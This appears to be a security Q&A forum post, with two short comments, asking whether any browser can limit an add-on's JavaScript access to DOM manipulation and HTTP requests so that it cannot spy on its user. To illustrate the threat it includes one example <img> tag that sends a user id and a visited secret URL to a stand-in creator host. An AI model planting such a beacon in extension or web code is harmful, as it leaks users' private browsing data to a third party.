0
In principle, any browser add-on can spy on me by collecting browser history, webmail or other sensitive data. AFAIKS, it could send this data back to its creator using either XMLHttpRequest()
or fetch()
or by manipulating the DOM, e.g. adding something like
<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>
triggering an HTTP request to the add-on creator's page with the possibility to send any data he likes. However, not all add-ons need to make HTTP requests or manipulate the DOM.
Hence the question:
Is there some existing solution for some browsers that restricts the JavaScript functionality accessible to an add-on - specifically to DOM manipulation and HTTP requests?
Good answer. The solution to me is use open source plugins only (and also open source browser) and make sure the binary has not been tampered with. – Marc.2377 – 2016-11-01T18:09:51.750
Originally I had another section in my question asking how to verify that an open source add-on was not tampered with - I think I'll add that back. – Thomas W. – 2016-11-01T18:42:43.677